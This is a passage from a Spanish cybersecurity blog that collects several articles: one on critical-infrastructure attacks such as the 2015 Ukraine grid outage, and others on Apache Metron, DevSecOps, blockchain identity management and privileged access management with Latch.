tipo de ataques, es importante darse cuenta de por qué los piratas informáticos deciden ir tras estas infraestructura crítica. De acuerdo con un estudio del 2013 en una investigación de Verizon, el 75 por ciento de los ciberatacantes se cometen por dinero. Sin embargo, aquellos que van tras infraestructuras críticas en un país no son atacantes comunes, guiados por el mismo patron habitual. Si bien la celebración de algo así como una rehén de estaciones electricas, sin duda causaría una gran cantidad de problemas para los consumidores de energía, un ataque de este estilo atraería demasiado la atención de las autoridades para que el autor pudiese hacerse con dinero. Un hacker movido por ganar dinero tendría mucho mas tiempo de maniobrabilidad en un hospital o una institución financiera. Los individuos involucrados en estos ataques estan la mayoria de las veces motivados por objetivos más elevados y de rangos, normalmente políticos, como podría ser la desestabilización de una región. Por ello, si anteriormente hemos indicado el afan de dinero, este tipo de ataques a instalaciones, están motivados políticamente. El cierre de la fuente de alimentación de un área, provoca pánico y la ira de la población, que es la cubierta perfecta para otro tipo de acciones. ## ¿Como logran entrar en los sistemas críticos? Estas personas generalmente están buscando soluciones de interfaz hombre-máquina. Estos sistemas son el centro de operaciones de los recursos , y se les da a los hackers una amplia gama de opciones de qué hacer. Para tener acceso , a los piratas informáticos generalmente les gusta explotar vulnerabilidades de corrupción de memoria. Estas situaciones representan alrededor del 20 por ciento de los problemas observados y pueden adoptar la forma de ataques tales como desbordamientos de búffer basados ​​en pila o incluso lecturas y escrituras fuera de límites. Otra forma de ataque importante, es la simple mala administración de credenciales privilegiadas (Diría que este es uno de los principales problemas). Se ve que las empresas pierden el control de los datos críticos de acceso administrador, o mucho peor, estos accesos de administrador, suelen ser los usados por defecto en los sistemas. Independientemente de cómo se encuentre el sistema, el objetivo final suele ser el mismo en estos ataques. Cuando un gobierno o un colectivo de cibercriminales decide ir tras una pieza de la infraestructura crítica de un país, generalmente el resultado llega a ser la caida de estos sistemas, con lo que ello conlleva. ## Ucrania perdió el control de sus instalaciones críticas Los ataques contra instalaciones de infraestructura críticas se han convertido en una amenaza muy real desde los días de Stuxnet. Uno de los incidentes más relevantes ha sido la piratería de la red eléctrica de Ucrania. El incidente comenzó el 23 de diciembre de 2015, cuando un hacker tuvo acceso a un programa informático que controla los interruptores del circuito en el centro de control de energía Prykarpattyaoblenergo. El hacker golpeo al sistema gubernamental región a región, hasta que alrededor de 230.000 personas perdieron el suministro de electricidad. El criminal llegó incluso a cortar el acceso a la estación de control, obligando a los empleados a trabajar para recuperar su propia energía antes de que pudieran ayudar a todos los demás. Se informó que este fue el primer ataque cibernético confirmado en el que se llego a cortar con éxito la capacidad de una compañía eléctrica para suministrar energía. Nadie ha reclamado la responsabilidad de este incidente en particular. Sin embargo, Ucrania ha culpado desde entonces a Rusia, ya que los dos países no están actualmente en las mejores condiciones debido a la anexión de Crimea por parte de Rusia. Tal y como se hizo, no parece que este ataque en particular estubiese destinado a lograr nada más que cerrar la fuente de alimentación de Ucrania. Una suposición sería que esto se hizo con el fin de exponer las vulnerabilidades actuales de naciones extranjeras con una inversión en la capacidad de utilizar estas debilidades contra Ucrania un futuro. ## Israel y sus ataques a infraestructuras críticas Aunque el ataque a infraestructuras de Ucrania es desconcertante, hay muchos otros países que tratan de forma continuada este tipo de ataques. Tal vez el mejor ejemplo de esto es Israel. Este país ha estado sujeto a toda clase de ataques físicos, por lo que tendría sentido que también luchasen constantemente contra ciberataques. > "Descubrimos entre 200.000 y 2 millones de intentos de hacking cada día en Israel a infraestructura crítica como agua, electricidad o ferrocarriles, pero estas , están bien protegidas". Claramente, esta cuestión se está poniendo seria, llendose fuera de control. Tener que lidiar con hasta 2 millones de ataques sobre una base diaria es una tarea importante, siendo casi imposible bloquear todos los ataques. Es una triste realidad detrás de la ciberseguridad: La víctima tiene que ganar en cada uno de los intentos, pero el hacker sólo tiene que ganar una vez. Si bien la seguridad es uno de los principales problemas para las empresas, la importancia se incrementa si hablamos de los riesgos de las infraestructuras críticas de todo un país. El número de acciones que se pueden tomar tras un ataque a la red energética de un país tiene repercusiones incontables, y todas terminan mal para los ciudadanos. ## Un importante riesgo a tener en cuenta Hace años, la mejor manera de defender la infraestructura crítica de un país era reforzar la seguridad física. La única manera en que un terrorista o una entidad extranjera podía destruir la red eléctrica era causar caos y destrucción a través de bombas y armas. Pero este ya no es el caso. Un equipo con suficientes conocimientos y la adecuada orientación y financiamiento, puede llegar a efectar a cientos de miles de personas sin tener que disparar una sola bala. Mientras que esto parece un pensamiento asustadizo, el miedo paralizante o el pánico a gran escala no es la respuesta. Por el contrario, los cuerpos del estado deben comenzar a ver estas instalaciones críticas ,como son las centrales eléctricas, como blancos de posibles ataques. Incluso algo no tan esencial como un proveedor de Internet ( La más importante empresa de Telecomunicaciones de España ) podría muy fácilmente encontrarse en el punto de mira de estos ciberataques. Internet permite la rápida distribución de la información, y causar pánico sería mucho más fácil y sencillo si la población no sabe lo que estaba pasando, cortando las comunicaciones (Practica muy comun en las guerras). Tener una lista de posibles objetivos críticos es el mejor punto de partida para prevenir un ataque que pudiese paralizar las infraestructuras de un país, y por supuesto, proteger las mismas. Además de este posible listado de instalaciones críticas, los administradores de estas instalaciones necesitan desarrollar soluciones de recuperación de desastres (Como si fuese un plan de continuidad de negocio). Los empleados reacionan mejor a una emergencia cuando se sabe lo que se espera de ellos, y trabajar este plan por parte de los trabajadores y personal implicado , podría ayudar a reducir el tiempo de inactividad de un ataque. Además, estos planes de actuación, pueden ayudarle a determinar qué sistemas necesitan ser recuperados primero para la reducción del pánico. Obteniendo como resultado de estos planteamientos en nuestro país , el El Centro Nacional para la Protección de las Infraestructuras Críticas (CNPIC). --- # Ciberseguridad basada en Big Data URL: https://ciberseguridad.blog/ciberseguridad-basada-en-big-data/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-01-02 Actualizado: 2026-09-29 Tema: Operaciones de Seguridad > Hablamos de Apache Merton, y el papel del Big Data en la ciberseguridad y como la misma nos beneficia. ¡ Aprende a aprovechar tus datos ! A día de hoy, las empresas más importantes, cada vez son más vulnerables y cada vez más están en el punto de mira de los atacantes, en un ecosistema digital y de IoT basado en API`s y aplicaciones cloud. El desafío en el que se ha trabajado estos años desde el punto de vista de la seguridad ha sido crear múltiples capas, surgiendo la falta de un enfoque holístico que combine la seguridad con el gobierno de datos, la auditoría y los atributos de calidad. Las soluciones tradicionales no pueden dar este enfoque de seguridad, y por ello, las soluciones emergentes que incorporan aprendizaje y analítica en tiempo real son una necesidad inminente en el sector. Para proporcionar un enfoque integrado de diferentes plataformas de seguridad, las empresas han comenzado a invertir en plataformas integradas de Centro de Operaciones de Seguridad (SOC). Los SOC disponen de capacidades centralizadas, diseñados para manejar todos y cada uno de los incidentes de seguridad en multitud de puntos finales. El objetivo es proporcionar herramientas para la recopilación de datos, la agregación de los mismos, la detección de amenazas y la capacidad de analítica avanzada, todo, desde un único punto de administración. Todos estos datos se incorporan a las herramientas SIEM (Security Incident and Event Management), que a continuación proporcionan informes desde un punto de vista de alertas de seguridad, y un analista de seguridad, determina si estas alertas representan una amenaza o son simplemente inofensivas. ## OpenSOC y Apache Metron Hace ya más de un año, empresas como Hortonworks, Rackspace, ManTech y B23 iniciaron un proyecto de nivel mundial llamado Apache Metron para fomentar, potenciar y acelerar el proyecto de código libre , OpenSOC. El objetivo de Metron es crear un proyecto de código abierto dedicado a proporcionar una plataforma de análisis de seguridad extensible y escalable para detectar y mitigar los riesgos de seguridad en tiempo real. Metron permite a los usuarios procesar enormes volúmenes de datos por segundo, lo que mejora la calidad de la detección y prevención de malware de manera significativa. Cuando una organización es atacada, los usuarios de Metron pueden colaborar entre sí utilizando los feeds de datos a través de la plataforma en tiempo real. Esto no sólo facilita la detección mejorada de campañas de malware por ejemplo, sino que también hace que los ataques sean económicamente inviables para los atacantes forzándolos a personalizarlos en cada objetivo. ## Componentes principales de Apache Metron Apache Metron integra una gran variedad de tecnologías de Big Data de código abierto para ofrecer una herramienta centralizada de monitorización y análisis de seguridad. Metron proporciona capacidades de agregación de registros, índices completos de captura de paquetes, almacenamiento, análisis avanzado de comportamiento y enriquecimiento de datos y multitud de capacidades más. Podemos así dividir la arquitectura de Metron en 5 áreas funcionales clave: - Un mecanismo para capturar, almacenar y normalizar cualquier tipo de telemetría de seguridad a tasas extremadamente altas. - Procesamiento en tiempo real y aplicación de datos enriquecidos, como inteligencia de amenazas, geo-ubicación e información de DNS a las telemetrías que se están recolectando. - Almacenamiento de información eficiente basada en cómo se utilizará la información. - Interfaz de escritorio que proporciona a los analistas de seguridad una vista centralizada de datos y alertas en un dashboard. - Seguridad mediante Big Data con Hadoop, Apache Spark y Apache Zeppelin Apache Metron ya empezó a cambiar las reglas del juego, un juego, el de seguridad, en el como en otros muchos ámbitos, disponer de un gran volumen de datos y tratarlos correctamente, nos hará poder ir un pasito más adelantado en muchos casos ## Big Data en Seguridad Hoy, os he hablado de Apache Metron, pero cada vez está mas claro el potencial del papel del Big Data en ciberseguridad. Hace unos días os hablé de las posibles predicciones de seguridad en 2017 , en el que, tal vez, podría añadir un punto más, que sería el uso de Big Data en la seguridad. Estamos en un punto, lo suficientemente maduro para tener un Big Data Empresarial muy potente, pero tal vez no tanto como para centrarnos en el uso de Big Data para el tratamiento de eventos e incidentes de seguridad, por ello, será tendencia para las empresas curtidas en seguridad y Big Data , pero no para la gran mayoría de empresas que están aplicando Big Data , descubriendo aún sus múltiples beneficios. --- # ¿ Que son los DevSecOps ? URL: https://ciberseguridad.blog/que-son-los-devsecops/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2016-12-27 Actualizado: 2026-09-29 Tema: DevOps > Devops es el proceso de integrar los equipos adecuados de Desarrollo y Operaciones/Soporte, añadiendo una capa de seguridad. ¡ Conoce cómo ! Creo que a día de hoy, todo el mundo está familiarizado con el término DevOps (Por qué el que trabaja en ello, es como el que deja de fumar, te recordará lo malo que es no ser "Ágiles" constantemente). Si bien significa diferentes cosas para diferentes personas, creo que el mejor resumen de una línea que he leído lo describe como "Desarrollo y Operación de la forma más rápida posible". Este aparentemente obvio cambio cultural de los equipos que rompen las barreras y los silos, combinado con tecnología habilitadora como Chef y Docker (Despliegue de software), que impulsa la automatización, la reutilización y la agilidad, agrega valor a todos los departamentos de TI. Entonces, ¿estamos ante el fin de la innovación en este ámbito? ¿Hemos logrado el nirvana de la entrega de código? Rotundamente NO, hemos estado perdiendo un componente clave ante esta Agilidad o rapidez, hemos pasado por alto la seguridad (Pero no importa, somos Ágiles) Todo ello, nos da pie a que hablemos de un término algo menos familiar: DevSecOps (también conocido como SecDevOps por algunas personas). El concepto, como podéis recoger del nombre, es algo similar al de DevOps. Con DevOps, el objetivo era traer el equipo de Ops (Operaciones) al equipo de desarrollo para que no fuera sólo un acople final de los proyectos. Lo mismo ocurre con DevSecOps: necesitamos garantizar que la seguridad ya no sea una idea tardía para un departamento aislado que se preocupa de estos inseguros desarrollos Ágiles, sino que se integre en todas las etapas de un proyecto y vistas a futuro. ¿Cómo podríamos hacer todo esto? Bueno, comprometeríamos a un recurso de seguridad en todos los proyectos para intentar obtener una configuración automatizada tan pronto como sea posible. Podríamos ejecutar pruebas de seguridad contra el código, pruebas en el proceso de liberación, incrustar herramientas, en definitiva, intentar registrar todo esto de una manera auditable. Para hacer las cosas de una forma aún más simple, es necesario integrar los procesos de seguridad (¡tal vez crearlos en algunos casos!). El cambio fundamental aquí es no sólo considerar la seguridad en cada etapa, sino ver la seguridad como algo que no ralentiza el trabajo y la productividad. Si se piensa con honestidad, la prisa por obtener un nuevo producto en el mercado es a menudo el principal conductor de la vulnerabilidad de la seguridad. En realidad, ¿cuál es la peor consecuencia que podría suceder con su nuevo producto encantador / una nueva aplicación / Web ? Una violación de seguridad. Empecemos a hacer algo al respecto. Pasemos de reparar el código roto o vulnerable, protegiéndonos a medida que el código es construido, probado y entregado. Hay algunos ejemplos más detallados de cómo integrar la seguridad en el ciclo de vida en la creación de software, pero no lo voy a repetir, sino que voy a volver a enfatizar la necesidad de ir pensando en conseguir equipos de seguridad involucrados en los procesos DevOps actuales. Nuestros equipos deben estar entusiasmados con esta premisa, ya que los chicos de seguridad pueden aprender sobre DevOps, y los chicos de DevOps pueden aprender sobre seguridad. Y si no conseguimos equipos lo suficientemente entusiasmados con esta oportunidad de aprender, entonces, debemos preguntarnos si tenemos los equipos adecuados para este DevOps y esta agilidad que tanto nos gusta. La seguridad a pasado, o debe pasar de ser un simple departamento o gerencia, a involucrarse en el ciclo de vida de los procesos ágiles, rompiendo la premisa de la ralentización. Sacar aplicaciones inseguras o vulnerables, será mucho menos ágil y productivo, debido a que la misma se tendrá que desarrollar 2 veces. --- # Blockchain Identity Management o como la gestión de identidades con Blockchain ya ha empezado URL: https://ciberseguridad.blog/blockchain-identity-management/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2016-12-18 Actualizado: 2026-09-29 Tema: Gestion de Identidades y Accesos > El futuro de la gestión de identidad, pasa por la gestión de identidad mediante blockchain, dando una mejor experiencia, cuidada de fraudes y ataques. Existe actualmente un "boom" sobre la posibilidad de usar la tecnología blockchain para la gestión de identidades. Pero en todo esto que es muy nuevo , las empresas a las que les puede llegar a interesar, quieren saber en qué casos de uso se están trabajando activamente en estos entornos, y cómo podría ayudarlos a solventar algunas necesidades. Si tomamos la gestión de la identidad tradicional, ésta empezo para enfrentarse a los desafíos de la identidad en los comienzos de internet. Con los primeros desafios de seguridad, privacidad y usabilidad. Debido por ejemplo a que la gente tiene que enviar sus credenciales de pago , el robo de tarjetas de crédito y el fraude de transacciones se ha visto incrementado cada año. Por ello, protocolos como 3-D Secure fueron creados para aumentar la seguridad de las transacciones en tarjetas de crédito y débito en línea, pero estos no fueron ampliamente adoptados y se enfrentan a muchos problemas de seguridad que afectan al consumidor directamente. Si estamos comprando mediante nuestros smartphones, ¿cómo podemos compartir selectivamente nuestros datos para identificarnos? ## El caso de éxito ShoCard / BlockCypher Mediante los servicios de BlockCypher, la empresa ShoCard , vio estos desafíos y trató de llevar rápidamente una solución al mercado utilizando la tecnología blockchain. Pero Shocard necesitaba una forma de experimentar todo esto rápidamente. Podría haber llevado meses probar un pequeño número de ideas utilizando la tecnología blockchain y habrían desperdiciado mucho tiempo en desarrollarlas, aumentando los costos y el riesgo. Incluso después de desarrollar una app, todavía habrían requerido una infraestructura que podría escalar muy rápidamente, según el impacto.En cambio, ShoCard se centró en la creación de una innovadora solución de gestión de identidad móvil utilizando la infraestructura blockchain de BlockCypher. Utilizando los servicios de API de BlockCypher y el sandbox de pruebas (BCY), ShoCard pudo experimentar rápidamente, aprender y probar muchas nuevas ideas de gestión de identidad en bloques. Como resultado, ShoCard creó una aplicación de administración de identidades que usa cifrado de clave pública / privada y hashing de datos para almacenar e intercambiar datos de identidad con seguridad. Estos datos de identidad incluyen datos biométricos como huellas dactilares, mapas faciales, patrones de iris y voz. > A través de la aplicación ShoCard, una persona administra y lleva sus datos de identidad en su teléfono móvil. Esta persona es la única persona que determina qué detalles de identidad se comparten. ShoCard utiliza su blockchain como un libro público, inmutable, que permite a terceros validar que los datos originales o la certificación no ha sido cambiada. El proceso de validación consiste en operaciones criptográficas que pueden ser realizadas por un SDKs de ShoCard o de terceros. ShoCard utiliza la API de BlockCypher en sus transacciones para publicar datos de identidad en distintos blockchains, con más del 99.99% de tiempo de actividad requerido para un modo de operación 24x7. Mediante el uso de BlockCypher, el equipo de desarrollo de ShoCard ahorró 6 meses de puesta en marcha y un 35% de tiempo en desarrollos. La infraestructura blockchain les dio un ciclo de desarrollo más corto, mayor confiabilidad de la red y un mantenimiento mejorado del código. Si bien el Bitcoin tiene el beneficio de ser el bloqueo público más seguro, Ethereum es de lejos el más extensible. Con la implementación consistente de BlockCypher tanto en Bitcoin como en Ethereum, las aplicaciones de administración de identidades podrán interactuar sin problemas con ambos bloqueos. Estas aplicaciones podrían transferir ciertos componentes de la identidad sin revelar otros o proporcionar esquemas de transparencia progresiva avanzada para el depósito de la identidad. Históricamente, el software blockchain se ha escrito para funcionar en los escritorios mas simples. En cambio, la solución de BlockCypher es modular, no tiene un único punto de fallo y se ejecuta en un entorno seguro. Además de esta infraestructura segura, escalable y probada, la aplicación de administración de identidad de ShoCard minimiza el fraude, ya que no hay una ubicación central privada que contiene la información privada del usuario. Para aumentar aún más la seguridad, no es necesario compartir todos los datos de identificación con otros servicios para autenticar o demostrar la propiedad de una cuenta. Y como es una aplicación móvil, ShoCard está diseñado para ser fácil de usar, pero de una forma lo suficientemente segura. ## Casos de uso de Gestión de Identidad Blockchain Los clientes de ShoCard incluyen bancos y compañías de servicios financieros. Los bancos y las compañías de servicios financieros están utilizando ShoCard para autorizar la identidad con reconocimiento facial, transacciones seguras de tarjetas de crédito, autenticarse en el call center, realizar transferencias de dinero y obtener las credenciales de usuarios. En el caso de uso de la autenticación del call center, los grupos de atención al cliente autentican a los clientes en cuestión de segundos, en lugar de realizar una larga serie de preguntas. Otro caso de uso son los servicios de comunicación en la industria aérea mundial. ShoCard ha creado una aplicación con la que los viajeros pueden acceder a cualquier lugar y generar un token con todos sus documentos de viaje. De esta manera, el personal de protección aeroportuaria y de fronteras puede obtener los datos de pasaportes, visados y datos biométricos sin tener que lidiar con todos los trámites y documentos. Mejorando en la experiencia de los viajeros al no tener las molestia de traer toda la documentación y documentos con ellos. La asociación ShoCard - BlockCypher es un gran ejemplo de compañías que trabajan juntas para ofrecer una mejor solución, especializándose en lo que cada equipo hace bien. BlockCypher proporciona la infraestructura robusta con escalabilidad y el desarrollo rápido. Y ShoCard proporciona una aplicación intuitiva y segura que la gente puede usar fácilmente. Pero se está empezando en la gestión de identidad con blockchain . En estos emocionantes momentos las empresas están luchando por darse cuenta por donde empezar, pero en muy poco tiempo , veremos más de estas asociaciones. Estamos ante el futuro cercano de la gestión de identidad. Un trending topic , al que debemos subirnos , un futuro al que dar a nuestros clientes una mejor experiencia , cuidada de fraudes y ataques. --- # Beneficios de las soluciones PAM (Privileged Access Management) y la necesidad de integración con Latch URL: https://ciberseguridad.blog/beneficios-de-las-soluciones-pam-privileged-access-management-y-la-necesidad-de-integracion-con-latch/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2016-12-13 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > Acceso privilegiado: Ventajas y Riesgos Cuando se trata de acceder y manipular sistemas TI de alto valor para el negocio, los usuarios privilegiados, como los administradores, suelen tener los requisitos de administración más altos. A menudo, los usuarios más capacitados técnicamente en una organización, son los operadores de TI, los cuales suelen ser responsables de desplegar y gestionar la funcionalidad de las que depende la empresa, desde mantenimiento diario, hasta capacidades estratégicas q ## Acceso privilegiado: Ventajas y Riesgos Cuando se trata de acceder y manipular sistemas TI de alto valor para el negocio, los usuarios privilegiados, como los administradores, suelen tener los requisitos de administración más altos. A menudo, los usuarios más capacitados técnicamente en una organización, son los operadores de TI, los cuales suelen ser responsables de desplegar y gestionar la funcionalidad de las que depende la empresa, desde mantenimiento diario, hasta capacidades estratégicas que permiten a la empresa mantener su ventaja competitiva. También pueden tener una responsabilidad considerable en las actividades del negocio, como la gestión de aplicaciones del mismo. Pero hay un importante riesgo dentro de tanto poder. La complejidad informática implica que, incluso cuando las tareas son realizadas por personal altamente cualificado, cualquier cambio erróneo puede llegar a tener impactos no intencionados y graves en la disponibilidad del servicio, el rendimiento y la integridad de los recursos. Un acceso no autorizado dentro de la organización, puede capitalizar el acceso privilegiado y causar daños graves e incluso irreparables al negocio. Dada la creciente sofisticación y sigilo de los ataques modernos a través del malware y otros métodos, es común que los atacantes obtengan y exploten tales privilegios al personificar a un personal confiada. ## La Gestión Privilegiada de la Identidad (PIM): Sola no es una buena idea . . . Las organizaciones, buscan cada vez controles más fuertes sobre el acceso privilegiado en las infraestructuras TI por distintas razones. Por cumplimiento [Imagen: Cumplimiento Normativo] Una serie de medidas normativas recomiendan o exigen controles específicos para la gestión de los riesgos del acceso privilegiado en TI. Normativas como Sarbanes-Oxley Act ("SOX"), requieren que las empresas que cotizan en bolsa Americana implementen procesos y controles para asegurar una gobernabilidad responsable de los activos y la información. La Normativa sobre Seguridad de Datos en la Industria de las Tarjetas de Pago (PCI DSS) versión 3.0 requiere medidas similares para proteger los datos de los titulares de tarjetas, particularmente en la separación de deberes (Buenas Prácticas y Requisito 6) y en el monitoreo y control del acceso privilegiado. 8). En el sector de los servicios públicos, las normas de Protección de Infraestructura Crítica (CIP) de la Corporación de Fiabilidad Eléctrica de América del Norte (NERC) exigen no sólo autenticación, control de acceso, delegación de acceso y separaciones de roles, sino que también requiere monitorización completa y continua, y auditorías de acceso. En el gobierno, la ley de Publicación Especial 800-53A Rev 4 de los Institutos Nacionales de Estándares y Tecnología de los Estados Unidos (NIST) hace amplias referencias a dichos accesos y también aborda los controles sobre acceso privilegiado en las estructuras TI, separación de roles y una atención especial hacia los accesos de administrador. > ¿Por qué estas normativas y leyes hablan constantemente sobre la necesidad de la monitorización y los control de acceso privilegiado? Asegurar la competencia de las prácticas empresariales [Imagen: Gobierno_de_roles] El acceso privilegiado controla muy a menudo los aspectos más fundamentales de las infraestructuras TI, desde el despliegue y la configuración hasta los matices de la gestión de aplicaciones y la experiencia del usuario final, tomando esto más importancia con los tan de moda DevOps. Sin ninguna restricción, esta capacidad puede resultar un daño real, no sólo en los sistemas TI críticos para la empresa. La Ley Sarbanes-Oxley y el PCI DSS, por ejemplo, hacen hincapié en la separación de funciones para asegurar un control responsable de los procesos empresariales. La gestión de privilegios y la monitorización en TI ayuda a asegurar que los sistemas empresariales no pueden ser manipulados para defraudar al negocio o sus clientes, robar o comprometer activos a través del control sobre los sistemas que los manejan. La separación de funciones en el control de usuarios administradores de TI ayuda a asegurar que los registros de desempeño del día a día, no puede ser comprometido ocultando actividades irresponsables o ilegales, o haciendo que los sistemas que supervisan y aseguran prácticas empresariales responsables, no pueden ser cegados u ocultados. O al menos imposibilitándolo lo máximo posible. Debido a que los que ciertos usuarios tienen privilegios de administrador de TI pueden crear y modificar dichas separaciones en los sistemas que manejan transacciones y datos críticos para el negocio, la monitorización y el control de usuarios privilegios administrativos. > El control y segregación de funciones de los usuarios privilegiados nos ayuda a asegurar que la integridad de las políticas y la aplicación de estas separaciones puedan permanecen inalteradas. ## Beneficios para el negocio [Imagen: Beneficios para el negocio] Además de las razones anteriores, las organizaciones deben considerar el control de accesos privilegiados como un medio para evitar o reducir los costes del mismo. ### Reducción de costes Personal autorizado ... pero cambio no autorizado - Muchas organizaciones adoptan procesos de control de cambios y control de incidencias, mucho más si la empresa es de gran tamaño, para así minimizar las interrupciones debidas a los cambios de TI. Pero, sin embargo, en momentos de emergencia o cierta urgentes, el personal que no es conscientes de las restricciones de cambios, haciendo uso de sus identificadores privilegiados, o siendo conscientes, pero por una mayor "Agilidad”, se termina haciendo uso de dichos privilegios. Estos factores deberían hacer que las organizaciones volviesen a pensar cómo manejar sus procesos de cambio TI. La complejidad de las infraestructuras TI hace que sea difícil prever el control de cada posible escenario, pero las restricciones sobre los administradores, en casi todos los casos pueden ayudar a las organizaciones a identificar preocupaciones, colocar controles granulares en los cambios y mantener una alta visibilidad en las actividades de administración apoyando a un análisis más preciso de la causa raíz ciertas problemáticas. Personal autorizado ... Cambio autorizado...pero consecuencias inesperadas. - Los administradores y técnicos autorizados evalúan e implementan los cambios como se esperaba, pero el resultado del cambio tiene un efecto no deseado. Los cambios de configuración y el despliegue de parches son ejemplos frecuentes. Los cambios pueden ser aprobados por los departamentos de "Gestión del cambio", pero los matices de los entornos de producción pueden variar de un objetivo a otro. El alcance del cambio puede no estar alineado con las intenciones, dando como resultado cambios en los sistemas involuntarios o fuera del alcance esperado del cambio. Los cambios pueden conciliarse con las configuraciones existentes indocumentadas que causan inestabilidad e interrupciones en los servicios. Incluso cuando todos los aspectos de los cambios están bien documentados, probados y anticipados, es posible que algunos cambios no se implementen como se esperaba. La implementación puede estar incompleta o puede producirse un desglose en una secuencia de dependencias. Los cambios que deben ser respaldados y reevaluados debido a degradaciones de rendimiento, disponibilidad o cortes son contribuciones significativas de incremento en los costes de TI para el negocio. El control de accesos privilegiados puede ayudar a contenerlos mediante la definición granular de los objetivos de acceso, el registro de la actividad de administradores o la limitación / contención del ámbito del acceso privilegiado y los usuarios autorizados para realizar tareas administrativas. La visibilidad granular en la actividad privilegiada también apoya la capacidad de identificar la causalidad específica en estos casos. Según una investigación de EMA , con un estudio de más de 200 empresas en todo el mundo, sólo alrededor de una cuarta parte de los encuestados logró los cuatro hitos de la gestión del cambio de TI "Plan-Do-Check-Act" (PDCA). Cuando se comparó con el otro 75% de este estudio, tuvieron como resultado: - La mitad de la incidencia mediana de eventos de seguridad que requieren una respuesta no planificada. - Menos incidentes de cambio de TI sin éxito que requieran remediación - Mayor proporción de administradores en los sistemas. - Más proyectos TI terminados a tiempo, dentro del presupuesto, con las características esperadas. ### Redución en la fuga de datos Datos del 2014, nos muestran que el 29% de los profesionales de TI encuestados se sienten frustrados por la necesidad de contar con herramientas para identificar actividades para el uso indebido de acceso privilegiado, conduciendo a brechas de datos e interrupciones en los accesos. Casi el dos por ciento de los mismos profesionales de TI dijeron que sus organizaciones tienen dificultades para identificar controles de seguridad funcionales y disfuncionales. La gestión de accesos privilegiados nos proporciona una mejora para abordar estas preocupaciones, la monitorización, el cumplimiento y los controles que regulan el uso del acceso privilegiado. Cuando se puede emplear un método común para administrar y hacer cumplir las políticas de auditoría, la autorización y autenticación en los centros de datos on-premises, los costes operativos de TI pueden reducirse aún más a través de un control más consistente de las acciones mediante una amplia visibilidad de las acciones, acelerando la resolución de problemas. Identidad autorizada ... pero uso no autorizado al acceso de datos y su extracción. - Una vez en el entorno, el malware utiliza la identidad de una víctima para moverse lateralmente dentro del entorno para realizar reconocimientos, proporcionar a los agentes de amenazas externas acceso interno y finalmente eliminar datos. Estas actividades aumentan directamente los costos de mantenimiento y soporte de TI. Peor aún, cuando los datos de los clientes se involucran, las brechas generan millones en costes de limpieza y notificaciones. De acuerdo con un estudio de IBM sobre el coste de los datos en 2014, el costo promedio pagado por registro de una infracción en la ley de datos es de $145 USD y el costo total promedio ascendía a $3.5M USD. Las organizaciones deben reconocer cómo la gestión de los accesos privilegiados puede ayudar a reducir estos costos a través de un control más efectivo de los privilegios, la monitorización y la proporcionar de información cuando las identidades se usen de manera sospechosa. ## Características de una solución efectiva ¿Qué debería tener una solución eficaz a estos problemas? ¿Cómo pueden las tecnologías de Gestión de Accesos Privilegiados ayudar a capitalizar la oportunidad de reducir los costos operativos de TI y las pérdidas de negocios a través de un mejor rendimiento en las identidades? Un enfoque integral debería: - Habilitar a las organizaciones para definir una serie de parámetros flexibles para controlar el acceso privilegiado, tales como ventanas de tiempo, restricción a individuos específicos u objetivos de acceso y limitar el acceso a roles o funciones específicas necesarias para una tarea concreta. - Consolidar identidades creando una "identidad" unificada y heterogénea en todos los sistemas y entornos operativos. Mejorando los informes y reduciendo el tiempo de auditoría y las investigaciones forenses. - Vincular el control basado en roles del acceso de los usuarios a los sistemas, aplicaciones y servicios críticos con identidades de usuario específicas. - Apoyando la vinculación de las cuentas administrativas, que a menudo son compartidas entre un grupo de profesionales cualificados, a la rendición de cuentas individuales o personales, mejorando la granularidad de la visibilidad y el control de las mismas. - Proporcionar una solución de auditoría y generación de informes amplia, fácil de controlar y consultar y completa para actividades de usuarios en sistemas críticos, incluyendo la capacidad de reproducción de sesiones de línea de comandos y sesiones gráficas de usuario ("reproducción de vídeo"). - Centralizar la visibilidad y el control de los privilegios a través de un "único panel de control" para la administración, la creación de política y la generación de informes en todos los servidores y sobre todos los usuarios administradores o privilegiados. Esto significa principalmente un aumento de la eficiencia (lo que ayuda a reducir aún más los costos) y ofrece un enfoque coherente de la gestión en todo el entorno. - Integrar la auditoría de actividad del usuario con syslog y generar informes con la información de seguridad y la gestión de eventos (SIEM) para aprender del comportamiento de los usuarios. - Hacer cumplir las normas del mínimo privilegios, con un control granular de los mismos, al mismo tiempo que se puede facilitar la elevación de privilegios controlada sin necesidad de conceder acceso completo de administrador o root. - Escalabilidad en sistemas o empresas con decenas de miles de identidades en sistemas operativos, soportando decenas de miles de sistemas distintos. ## Necesidad de integración de Latch con soluciones Privileged Access Management [Imagen: latch_Gesti-n_Acceso_Privilegiado-compressor] Ya conocemos, como hemos visto en el resto de post, alguna de las principales ventajas de las soluciones PAM y las mejoras sustanciales asociadas a una buena gestión de accesos privilegiados. Pero ahora, empecemos a dar más potencial a las mismas, empecemos a vitaminar esas aplicaciones "comerciales" como CyberArk , CA o similares, dotándolas de mayores funciones gracias a Latch. Hemos visto que una de las mejoras o beneficios, hace referencia a la gestión de cambios y el ciclo de vida de las incidencias, y es aquí, donde vamos a poner nuestro primer foco del uso de Latch, debido a que nuestro primer caso de uso potencial, es de gran importancia para grandes empresas, ya que dependiendo del principal activo que venda la empresa o la actividad a la que se dedique, veamos momentos de congelaciones de cambios, provenientes directamente del CIO o las direcciones de Producción. Un ejemplo de ello, podría ser la congelación de cambios en los entornos de producción debido a las campañas navideñas, asociadas a un aumento disparado del número de ventas y contrataciones de servicios. > Normalmente, estas congelaciones en los cambios se deben a que será más perjudicial para el negocio estar X tiempo sin servicio, lo que conlleva no vender, a estar un tiempo Y sin aplicar un parche que se puede postponer. Es en este punto, donde podemos crear un valor añadido, si juntamos Latch de una forma "Multivaluada" en distintos sistemas y con distintos Personajes, generando uno de los primeros casos de valor añadido gracias a Latch en las soluciones PAM: - Si el presidente de la compañía ó nuestro CIO ó nuestro director de Producción ó nosotros tenemos cerrado Latch, no podemos acceder a la aplicación de gestión de usuarios privilegiados, y por ende , realizar ningún tipo de cambio. Ahora, vamos a ir un punto más allá, un punto que cada vez está tomando más fuerza y que cada vez es más importante en las grandes empresas, que hace referencia a las múltiples capas de seguridad existentes en las grandes organizaciones multinacionales, en las que disponemos de CISO 